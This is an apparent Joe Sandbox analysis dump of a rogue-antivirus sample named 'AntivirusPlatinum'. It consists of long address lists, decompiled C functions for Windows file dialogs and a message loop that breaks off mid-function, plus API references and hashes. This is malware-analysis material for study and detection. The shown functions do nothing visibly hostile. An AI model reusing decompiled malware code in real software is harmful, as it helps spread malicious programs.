                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c179
                                                                                                                                                  0x0040c187
                                                                                                                                                  0x0040c195
                                                                                                                                                  0x0040c19a
                                                                                                                                                  0x0040c19c
                                                                                                                                                  0x0040c19d
                                                                                                                                                  0x0040c1a7
                                                                                                                                                  0x0040c1ae
                                                                                                                                                  0x0040c1b5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c1b5
                                                                                                                                                  0x0040c152
                                                                                                                                                  0x0040c159
                                                                                                                                                  0x0040c15e
                                                                                                                                                  0x0040c161
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c23a
                                                                                                                                                  0x0040c23a
                                                                                                                                                  0x0040c243
                                                                                                                                                  0x0040c249
                                                                                                                                                  0x0040c24e
                                                                                                                                                  0x0040c24e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c0f5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c266
                                                                                                                                                  0x0040c266
                                                                                                                                                  0x0040c26a
                                                                                                                                                  0x0040c270
                                                                                                                                                  0x0040c275
                                                                                                                                                  0x0040c277
                                                                                                                                                  0x0040c27a
                                                                                                                                                  0x0040c27c
                                                                                                                                                  0x0040c284
                                                                                                                                                  0x0040c284
                                                                                                                                                  0x0040c289
                                                                                                                                                  0x0040c289
                                                                                                                                                  0x0040c28d
                                                                                                                                                  0x0040c297
                                                                                                                                                  0x0040c29f
                                                                                                                                                  0x0040c28f
                                                                                                                                                  0x0040c28f
                                                                                                                                                  0x0040c28f
                                                                                                                                                  0x0040c2a1
                                                                                                                                                  0x0040c2a3
                                                                                                                                                  0x0040c2b4
                                                                                                                                                  0x0040c2a5
                                                                                                                                                  0x0040c2a5
                                                                                                                                                  0x0040c2a5
                                                                                                                                                  0x0040c2bc
                                                                                                                                                  0x0040c2c7
                                                                                                                                                  0x0040c2cc
                                                                                                                                                  0x0040c2d1
                                                                                                                                                  0x0040c2d3
                                                                                                                                                  0x0040c2d5
                                                                                                                                                  0x0040c2d5
                                                                                                                                                  0x0040c2d8
                                                                                                                                                  0x0040c2da
                                                                                                                                                  0x0040c2df
                                                                                                                                                  0x0040c2e3
                                                                                                                                                  0x0040c2ea
                                                                                                                                                  0x0040c2ea
                                                                                                                                                  0x0040c2e3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c2f4
                                                                                                                                                  0x0040c2f4
                                                                                                                                                  0x0040c2f8
                                                                                                                                                  0x0040c308
                                                                                                                                                  0x0040c308
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c313
                                                                                                                                                  0x0040c313
                                                                                                                                                  0x0040c317
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c31d
                                                                                                                                                  0x0040c31d
                                                                                                                                                  0x0040c324
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c32a
                                                                                                                                                  0x0040c32a
                                                                                                                                                  0x0040c331
                                                                                                                                                  0x0040c337
                                                                                                                                                  0x0040c33e
                                                                                                                                                  0x0040c340
                                                                                                                                                  0x0040c340
                                                                                                                                                  0x0040c347
                                                                                                                                                  0x0040c34c
                                                                                                                                                  0x0040c351
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c357
                                                                                                                                                  0x0040c357
                                                                                                                                                  0x0040c357
                                                                                                                                                  0x0040c359
                                                                                                                                                  0x0040c35b
                                                                                                                                                  0x0040c408
                                                                                                                                                  0x0040c408
                                                                                                                                                  0x0040c40a
                                                                                                                                                  0x0040c36e
                                                                                                                                                  0x0040c376
                                                                                                                                                  0x0040c37b
                                                                                                                                                  0x0040c37d
                                                                                                                                                  0x0040c384
                                                                                                                                                  0x0040c389
                                                                                                                                                  0x0040c38b
                                                                                                                                                  0x0040c38d
                                                                                                                                                  0x0040c391
                                                                                                                                                  0x0040c393
                                                                                                                                                  0x0040c393
                                                                                                                                                  0x0040c391
                                                                                                                                                  0x0040c39e
                                                                                                                                                  0x0040c3aa
                                                                                                                                                  0x0040c3ba
                                                                                                                                                  0x0040c3c4
                                                                                                                                                  0x0040c3d3
                                                                                                                                                  0x0040c3d9
                                                                                                                                                  0x0040c3e1
                                                                                                                                                  0x0040c3e6
                                                                                                                                                  0x0040c3e8
                                                                                                                                                  0x0040c3fd
                                                                                                                                                  0x0040c3fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c3e8
                                                                                                                                                  0x0040c410
                                                                                                                                                  0x0040c410
                                                                                                                                                  0x0040c412
                                                                                                                                                  0x0040c41e
                                                                                                                                                  0x0040c41e
                                                                                                                                                  0x0040c430
                                                                                                                                                  0x0040c436
                                                                                                                                                  0x0040c438
                                                                                                                                                  0x0040c43e
                                                                                                                                                  0x0040c445
                                                                                                                                                  0x0040c453
                                                                                                                                                  0x0040c463
                                                                                                                                                  0x0040c463
                                                                                                                                                  0x0040c469
                                                                                                                                                  0x0040c470
                                                                                                                                                  0x0040c472
                                                                                                                                                  0x0040c479
                                                                                                                                                  0x0040c47e
                                                                                                                                                  0x0040c484
                                                                                                                                                  0x0040c485
                                                                                                                                                  0x0040c489
                                                                                                                                                  0x0040c497
                                                                                                                                                  0x0040c497
                                                                                                                                                  0x0040c489
                                                                                                                                                  0x0040c4a2
                                                                                                                                                  0x0040c4a4
                                                                                                                                                  0x0040c4b0
                                                                                                                                                  0x0040c4b2
                                                                                                                                                  0x0040c4b8
                                                                                                                                                  0x0040c4c6
                                                                                                                                                  0x0040c4c6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c4b8
                                                                                                                                                  0x0040c414
                                                                                                                                                  0x0040c414
                                                                                                                                                  0x0040c418
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c418
                                                                                                                                                  0x0040c361
                                                                                                                                                  0x0040c361
                                                                                                                                                  0x0040c365
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c36b
                                                                                                                                                  0x0040c36b
                                                                                                                                                  0x0040c36b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c36b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c4d0
                                                                                                                                                  0x0040c4d0
                                                                                                                                                  0x0040c4d1
                                                                                                                                                  0x0040c4d6
                                                                                                                                                  0x0040c4d8
                                                                                                                                                  0x0040c4db
                                                                                                                                                  0x0040c4db
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c511
                                                                                                                                                  0x0040c511
                                                                                                                                                  0x0040c518
                                                                                                                                                  0x0040c518
                                                                                                                                                  0x0040c51b
                                                                                                                                                  0x0040c548
                                                                                                                                                  0x0040c548
                                                                                                                                                  0x0040c54f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c54f
                                                                                                                                                  0x0040c51d
                                                                                                                                                  0x0040c51d
                                                                                                                                                  0x0040c51d
                                                                                                                                                  0x0040c520
                                                                                                                                                  0x0040c535
                                                                                                                                                  0x0040c535
                                                                                                                                                  0x0040c53c
                                                                                                                                                  0x0040c53c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c53c
                                                                                                                                                  0x0040c522
                                                                                                                                                  0x0040c522
                                                                                                                                                  0x0040c522
                                                                                                                                                  0x0040c523
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c525
                                                                                                                                                  0x0040c525
                                                                                                                                                  0x0040c525
                                                                                                                                                  0x0040c526
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c52c
                                                                                                                                                  0x0040c52c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c59d
                                                                                                                                                  0x0040c59d
                                                                                                                                                  0x0040c5a1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c5a7
                                                                                                                                                  0x0040c5a7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c745
                                                                                                                                                  0x0040c745
                                                                                                                                                  0x0040c749
                                                                                                                                                  0x0040c74b
                                                                                                                                                  0x0040c752
                                                                                                                                                  0x0040c75e
                                                                                                                                                  0x0040c75e
                                                                                                                                                  0x0040c764
                                                                                                                                                  0x0040c76c
                                                                                                                                                  0x0040c76c
                                                                                                                                                  0x0040c771
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c77d
                                                                                                                                                  0x0040c77d
                                                                                                                                                  0x0040c781
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c787
                                                                                                                                                  0x0040c787
                                                                                                                                                  0x0040c5a9
                                                                                                                                                  0x0040c5af
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c78e
                                                                                                                                                  0x0040c78e
                                                                                                                                                  0x0040c792
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c798
                                                                                                                                                  0x0040c798
                                                                                                                                                  0x0040c7a0
                                                                                                                                                  0x0040c7a5
                                                                                                                                                  0x0040c7a5
                                                                                                                                                  0x0040c7a8
                                                                                                                                                  0x0040c7cd
                                                                                                                                                  0x0040c7aa
                                                                                                                                                  0x0040c7aa
                                                                                                                                                  0x0040c7aa
                                                                                                                                                  0x0040c7ad
                                                                                                                                                  0x0040c7c4
                                                                                                                                                  0x0040c7af
                                                                                                                                                  0x0040c7af
                                                                                                                                                  0x0040c7af
                                                                                                                                                  0x0040c7b0
                                                                                                                                                  0x0040c7bb
                                                                                                                                                  0x0040c7b2
                                                                                                                                                  0x0040c7b2
                                                                                                                                                  0x0040c7b2
                                                                                                                                                  0x0040c7b0
                                                                                                                                                  0x0040c7ad
                                                                                                                                                  0x0040c7db
                                                                                                                                                  0x0040c7e2
                                                                                                                                                  0x0040c7e9
                                                                                                                                                  0x0040c7f0
                                                                                                                                                  0x0040c7f5
                                                                                                                                                  0x0040c7fc
                                                                                                                                                  0x0040c83d
                                                                                                                                                  0x0040c846
                                                                                                                                                  0x0040c84b
                                                                                                                                                  0x0040c84d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c84f
                                                                                                                                                  0x0040c84f
                                                                                                                                                  0x0040c851
                                                                                                                                                  0x0040c858
                                                                                                                                                  0x0040c85e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c860
                                                                                                                                                  0x0040c860
                                                                                                                                                  0x0040c860
                                                                                                                                                  0x0040c862
                                                                                                                                                  0x0040c865
                                                                                                                                                  0x0040c86c
                                                                                                                                                  0x0040c86e
                                                                                                                                                  0x0040c875
                                                                                                                                                  0x0040c878
                                                                                                                                                  0x0040c87d
                                                                                                                                                  0x0040c87f
                                                                                                                                                  0x0040c8b1
                                                                                                                                                  0x0040c8b1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c8b1
                                                                                                                                                  0x0040c881
                                                                                                                                                  0x0040c881
                                                                                                                                                  0x0040c883
                                                                                                                                                  0x0040c886
                                                                                                                                                  0x0040c89a
                                                                                                                                                  0x0040c89a
                                                                                                                                                  0x0040c89a
                                                                                                                                                  0x0040c89b
                                                                                                                                                  0x0040c89b
                                                                                                                                                  0x0040c8a0
                                                                                                                                                  0x0040c8a1
                                                                                                                                                  0x0040c8a7
                                                                                                                                                  0x0040c8a7
                                                                                                                                                  0x0040c8a8
                                                                                                                                                  0x0040c8ad
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c8ad
                                                                                                                                                  0x0040c888
                                                                                                                                                  0x0040c888
                                                                                                                                                  0x0040c888
                                                                                                                                                  0x0040c88b
                                                                                                                                                  0x0040c88c
                                                                                                                                                  0x0040c892
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c892
                                                                                                                                                  0x0040c867
                                                                                                                                                  0x0040c867
                                                                                                                                                  0x0040c86a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c8b3
                                                                                                                                                  0x0040c8b3
                                                                                                                                                  0x0040c8b4
                                                                                                                                                  0x0040c8b4
                                                                                                                                                  0x0040c8b9
                                                                                                                                                  0x0040c8bb
                                                                                                                                                  0x0040c8bd
                                                                                                                                                  0x0040c8bd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7fe
                                                                                                                                                  0x0040c7fe
                                                                                                                                                  0x0040c805
                                                                                                                                                  0x0040c813
                                                                                                                                                  0x0040c81a
                                                                                                                                                  0x0040c81f
                                                                                                                                                  0x0040c821
                                                                                                                                                  0x0040c827
                                                                                                                                                  0x0040c833
                                                                                                                                                  0x0040c833
                                                                                                                                                  0x0040c8c0
                                                                                                                                                  0x0040c8c0
                                                                                                                                                  0x0040c8c7
                                                                                                                                                  0x0040c8d0
                                                                                                                                                  0x0040c8d7
                                                                                                                                                  0x0040c8d7
                                                                                                                                                  0x0040c8e3
                                                                                                                                                  0x0040c8f2
                                                                                                                                                  0x0040c8f9
                                                                                                                                                  0x0040c905
                                                                                                                                                  0x0040c90a
                                                                                                                                                  0x0040c911
                                                                                                                                                  0x0040c91a
                                                                                                                                                  0x0040c926
                                                                                                                                                  0x0040c92d
                                                                                                                                                  0x0040c92d
                                                                                                                                                  0x0040c939
                                                                                                                                                  0x0040c940
                                                                                                                                                  0x0040c945
                                                                                                                                                  0x0040c94c
                                                                                                                                                  0x0040c952
                                                                                                                                                  0x0040c954
                                                                                                                                                  0x0040c954
                                                                                                                                                  0x0040c968
                                                                                                                                                  0x0040c96d
                                                                                                                                                  0x0040c974
                                                                                                                                                  0x0040c979
                                                                                                                                                  0x0040c97b
                                                                                                                                                  0x0040c98c
                                                                                                                                                  0x0040c998
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c97d
                                                                                                                                                  0x0040c97d
                                                                                                                                                  0x0040c983
                                                                                                                                                  0x0040c988
                                                                                                                                                  0x0040c98a
                                                                                                                                                  0x0040c99d
                                                                                                                                                  0x0040c9a8
                                                                                                                                                  0x0040c9b4
                                                                                                                                                  0x0040c9b6
                                                                                                                                                  0x0040c9b8
                                                                                                                                                  0x0040c9c1
                                                                                                                                                  0x0040c9c8
                                                                                                                                                  0x0040c9ca
                                                                                                                                                  0x0040c9cc
                                                                                                                                                  0x0040c9d5
                                                                                                                                                  0x0040c9dc
                                                                                                                                                  0x0040c9de
                                                                                                                                                  0x0040c9e0
                                                                                                                                                  0x0040c9e9
                                                                                                                                                  0x0040c9f7
                                                                                                                                                  0x0040c9fc
                                                                                                                                                  0x0040ca03
                                                                                                                                                  0x0040ca07
                                                                                                                                                  0x0040ca15
                                                                                                                                                  0x0040ca15
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ca03
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c98a
                                                                                                                                                  0x0040c97b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ca1d
                                                                                                                                                  0x0040ca1d
                                                                                                                                                  0x0040ca21
                                                                                                                                                  0x0040ca23
                                                                                                                                                  0x0040ca23
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c55b
                                                                                                                                                  0x0040c55b
                                                                                                                                                  0x0040c563
                                                                                                                                                  0x0040c568
                                                                                                                                                  0x0040c56b
                                                                                                                                                  0x0040c591
                                                                                                                                                  0x0040c56d
                                                                                                                                                  0x0040c56d
                                                                                                                                                  0x0040c570
                                                                                                                                                  0x0040c585
                                                                                                                                                  0x0040c572
                                                                                                                                                  0x0040c572
                                                                                                                                                  0x0040c579
                                                                                                                                                  0x0040c579
                                                                                                                                                  0x0040c570
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c008
                                                                                                                                                  0x0040c00c
                                                                                                                                                  0x0040c011
                                                                                                                                                  0x0040c018
                                                                                                                                                  0x0040c018
                                                                                                                                                  0x0040c01b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c01d
                                                                                                                                                  0x0040c01d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c01d
                                                                                                                                                  0x0040c01b
                                                                                                                                                  0x0040ca58
                                                                                                                                                  0x0040ca5c
                                                                                                                                                  0x0040ca5c
                                                                                                                                                  0x0040c63b
                                                                                                                                                  0x0040c642
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c648
                                                                                                                                                  0x0040c64a
                                                                                                                                                  0x0040c651
                                                                                                                                                  0x0040c658
                                                                                                                                                  0x0040c65f
                                                                                                                                                  0x0040c69f
                                                                                                                                                  0x0040c6a6
                                                                                                                                                  0x0040c6af
                                                                                                                                                  0x0040c6bb
                                                                                                                                                  0x0040c6c9
                                                                                                                                                  0x0040c6c9
                                                                                                                                                  0x0040c6d5
                                                                                                                                                  0x0040c6e3
                                                                                                                                                  0x0040c6ed
                                                                                                                                                  0x0040c6f4
                                                                                                                                                  0x0040c6fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c703
                                                                                                                                                  0x0040c703
                                                                                                                                                  0x0040c705
                                                                                                                                                  0x0040c70a
                                                                                                                                                  0x0040c711
                                                                                                                                                  0x0040c716
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c716
                                                                                                                                                  0x0040c6fd
                                                                                                                                                  0x0040c661
                                                                                                                                                  0x0040c661
                                                                                                                                                  0x0040c66a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c66c
                                                                                                                                                  0x0040c66c
                                                                                                                                                  0x0040c674
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c676
                                                                                                                                                  0x0040c676
                                                                                                                                                  0x0040c67f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c681
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c681
                                                                                                                                                  0x0040c683
                                                                                                                                                  0x0040c68b
                                                                                                                                                  0x0040c692
                                                                                                                                                  0x0040c697
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c71c
                                                                                                                                                  0x0040c720
                                                                                                                                                  0x0040c72d
                                                                                                                                                  0x0040c72f
                                                                                                                                                  0x0040c72f
                                                                                                                                                  0x0040c739
                                                                                                                                                  0x0040c739
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c720

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DialogItemMessagePathTempText
                                                                                                                                                  • String ID: %s%s%d$@
                                                                                                                                                  • API String ID: 2494799851-3206671281
                                                                                                                                                  • Opcode ID: b60175ef51fccfefb6d42f0a9252ebfaf611be2a1e8d9d8e576f50eb8e4d0200
                                                                                                                                                  • Instruction ID: 60ff87052d5ec9c8cb07c29fa8386008fa4b4f1150e87128aeb403cb9a6e3690
                                                                                                                                                  • Opcode Fuzzy Hash: b60175ef51fccfefb6d42f0a9252ebfaf611be2a1e8d9d8e576f50eb8e4d0200
                                                                                                                                                  • Instruction Fuzzy Hash: CE416D7190525CEEEB21EBA0CD88FDA77ACAB04304F0085B6E509E2190D7B99B89CF55
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                  			E00402854(intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, char _a20) {
                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                  				CHAR* _v36;
                                                                                                                                                  				long _v48;
                                                                                                                                                  				char* _v52;
                                                                                                                                                  				char* _v68;
                                                                                                                                                  				intOrPtr _v72;
                                                                                                                                                  				intOrPtr _v76;
                                                                                                                                                  				char _v80;
                                                                                                                                                  				char _v592;
                                                                                                                                                  				char _v1616;
                                                                                                                                                  				void* _t39;
                                                                                                                                                  				intOrPtr _t43;
                                                                                                                                                  				signed int _t48;
                                                                                                                                                  				void* _t61;
                                                                                                                                                  				signed int _t63;
                                                                                                                                                  				void* _t65;
                                                                                                                                                  				char _t66;
                                                                                                                                                  				char* _t67;
                                                                                                                                                  				void* _t68;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  				signed int _t76;
                                                                                                                                                  
                                                                                                                                                  				_t64 =  &_v592;
                                                                                                                                                  				if(_a16 != 0) {
                                                                                                                                                  					E0040A477( &_v592, _a16);
                                                                                                                                                  					_t68 = _t69 + E0040A384(_t61,  &_v592) - 0x24b;
                                                                                                                                                  					E0040A477(_t68, _a16);
                                                                                                                                                  					_t64 = _t68 + E0040A384(_t61, _t68) + 1;
                                                                                                                                                  				}
                                                                                                                                                  				E0040A477(_t64, E004098F7(0x85));
                                                                                                                                                  				_t65 = _t64 + E0040A384(_t61, _t64) + 1;
                                                                                                                                                  				E0040A477(_t65, 0x4122d4);
                                                                                                                                                  				_t39 = E0040A384(_t61, _t65);
                                                                                                                                                  				 *((char*)(_t39 + _t65 + 1)) = 0;
                                                                                                                                                  				_t66 = 0x4c;
                                                                                                                                                  				E0040A289(_t61,  &_v80, 0, _t66);
                                                                                                                                                  				_v76 = _a4;
                                                                                                                                                  				_t43 =  *0x414c78; // 0x400000
                                                                                                                                                  				_v72 = _t43;
                                                                                                                                                  				_v80 = _t66;
                                                                                                                                                  				_t67 = _a12;
                                                                                                                                                  				_v68 =  &_v592;
                                                                                                                                                  				_v52 = _t67;
                                                                                                                                                  				_v48 = 0x400;
                                                                                                                                                  				_v32 = _a8;
                                                                                                                                                  				if(E004073DB(_t67) == _t67) {
                                                                                                                                                  					GetCurrentDirectoryA(0x400,  &_v1616);
                                                                                                                                                  					_v36 =  &_v1616;
                                                                                                                                                  				}
                                                                                                                                                  				_v28 = 0x1080c;
                                                                                                                                                  				_push( &_v80);
                                                                                                                                                  				if(_a20 == 0) {
                                                                                                                                                  					_t48 = GetOpenFileNameA();
                                                                                                                                                  				} else {
                                                                                                                                                  					_t48 = GetSaveFileNameA();
                                                                                                                                                  				}
                                                                                                                                                  				_t63 = _t48;
                                                                                                                                                  				if(_t63 == 0) {
                                                                                                                                                  					_t48 = CommDlgExtendedError();
                                                                                                                                                  					if(_t48 == 0x3002) {
                                                                                                                                                  						 *_t67 = 0;
                                                                                                                                                  						_push( &_v80);
                                                                                                                                                  						if(_a20 == 0) {
                                                                                                                                                  							_t48 = GetOpenFileNameA();
                                                                                                                                                  						} else {
                                                                                                                                                  							_t48 = GetSaveFileNameA();
                                                                                                                                                  						}
                                                                                                                                                  						_t63 = _t48;
                                                                                                                                                  					}
                                                                                                                                                  					_t76 = _t63;
                                                                                                                                                  				}
                                                                                                                                                  				return _t48 & 0xffffff00 | _t76 != 0x00000000;
                                                                                                                                                  			}

























                                                                                                                                                  0x00402864
                                                                                                                                                  0x0040286a
                                                                                                                                                  0x00402872
                                                                                                                                                  0x00402882
                                                                                                                                                  0x0040288a
                                                                                                                                                  0x00402895
                                                                                                                                                  0x00402895
                                                                                                                                                  0x004028a5
                                                                                                                                                  0x004028b0
                                                                                                                                                  0x004028ba
                                                                                                                                                  0x004028c0
                                                                                                                                                  0x004028c7
                                                                                                                                                  0x004028cc
                                                                                                                                                  0x004028d4
                                                                                                                                                  0x004028dc
                                                                                                                                                  0x004028df
                                                                                                                                                  0x004028e4
                                                                                                                                                  0x004028ed
                                                                                                                                                  0x004028f0
                                                                                                                                                  0x004028f3
                                                                                                                                                  0x004028ff
                                                                                                                                                  0x00402902
                                                                                                                                                  0x00402905
                                                                                                                                                  0x0040290f
                                                                                                                                                  0x00402919
                                                                                                                                                  0x00402925
                                                                                                                                                  0x00402925
                                                                                                                                                  0x00402935
                                                                                                                                                  0x0040293c
                                                                                                                                                  0x0040293d
                                                                                                                                                  0x00402947
                                                                                                                                                  0x0040293f
                                                                                                                                                  0x0040293f
                                                                                                                                                  0x0040293f
                                                                                                                                                  0x00402949
                                                                                                                                                  0x0040294d
                                                                                                                                                  0x0040294f
                                                                                                                                                  0x0040295a
                                                                                                                                                  0x00402963
                                                                                                                                                  0x00402966
                                                                                                                                                  0x00402967
                                                                                                                                                  0x00402971
                                                                                                                                                  0x00402969
                                                                                                                                                  0x00402969
                                                                                                                                                  0x00402969
                                                                                                                                                  0x00402973
                                                                                                                                                  0x00402973
                                                                                                                                                  0x00402975
                                                                                                                                                  0x00402975
                                                                                                                                                  0x0040297e

                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentDirectoryA.KERNEL32(00000400,?,?,?,00000000,0000004C,?,?,004122D4,?,?,00000000,00000085,?,?), ref: 00402919
                                                                                                                                                  • GetSaveFileNameA.COMDLG32(?,?,?,00000000,0000004C,?,?,004122D4,?,?,00000000,00000085,?,?), ref: 0040293F
                                                                                                                                                  • GetOpenFileNameA.COMDLG32(?,?,?,00000000,0000004C,?,?,004122D4,?,?,00000000,00000085,?,?), ref: 00402947
                                                                                                                                                  • CommDlgExtendedError.COMDLG32 ref: 0040294F
                                                                                                                                                  • GetSaveFileNameA.COMDLG32(?), ref: 00402969
                                                                                                                                                  • GetOpenFileNameA.COMDLG32(?), ref: 00402971
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileName$OpenSave$CommCurrentDirectoryErrorExtended
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1809602070-0
                                                                                                                                                  • Opcode ID: 6245d7889aa86965bb41dfc6eb2fa2d3cf87c008a1edef2314fa0fcf31d269f6
                                                                                                                                                  • Instruction ID: ff30afd232e3d8f3ba4cc359dfcf402cea8e18d8be24ab53ae8b2113f52266a8
                                                                                                                                                  • Opcode Fuzzy Hash: 6245d7889aa86965bb41dfc6eb2fa2d3cf87c008a1edef2314fa0fcf31d269f6
                                                                                                                                                  • Instruction Fuzzy Hash: 8F31B3B59012199BCB11EFA5C949FDE7BB8AF04314F104026FD44F3281C7789955CBAA
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                  			E004064FD(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				long _v16;
                                                                                                                                                  				struct tagMSG _v44;
                                                                                                                                                  				long _t24;
                                                                                                                                                  				intOrPtr* _t29;
                                                                                                                                                  				intOrPtr* _t32;
                                                                                                                                                  				intOrPtr* _t34;
                                                                                                                                                  				intOrPtr* _t36;
                                                                                                                                                  				struct HWND__* _t46;
                                                                                                                                                  				intOrPtr* _t53;
                                                                                                                                                  
                                                                                                                                                  				_t46 = 0;
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_t24 = GetTickCount();
                                                                                                                                                  				_t53 = _a4;
                                                                                                                                                  				_v16 = _t24;
                                                                                                                                                  				while(1) {
                                                                                                                                                  					_push( &_v12);
                                                                                                                                                  					_push(_t53);
                                                                                                                                                  					if( *((intOrPtr*)( *_t53 + 0x48))() >= 0 && _v12 != _t46) {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					if(GetTickCount() - _v16 > 0x2710) {
                                                                                                                                                  						break;
                                                                                                                                                  					} else {
                                                                                                                                                  						if(PeekMessageA( &_v44, _t46, _t46, _t46, _t46) != 0) {
                                                                                                                                                  							GetMessageA( &_v44, _t46, _t46, _t46);
                                                                                                                                                  							TranslateMessage( &_v44);
                                                                                                                                                  							DispatchMessageA( &_v44);
                                                                                                                                                  						}
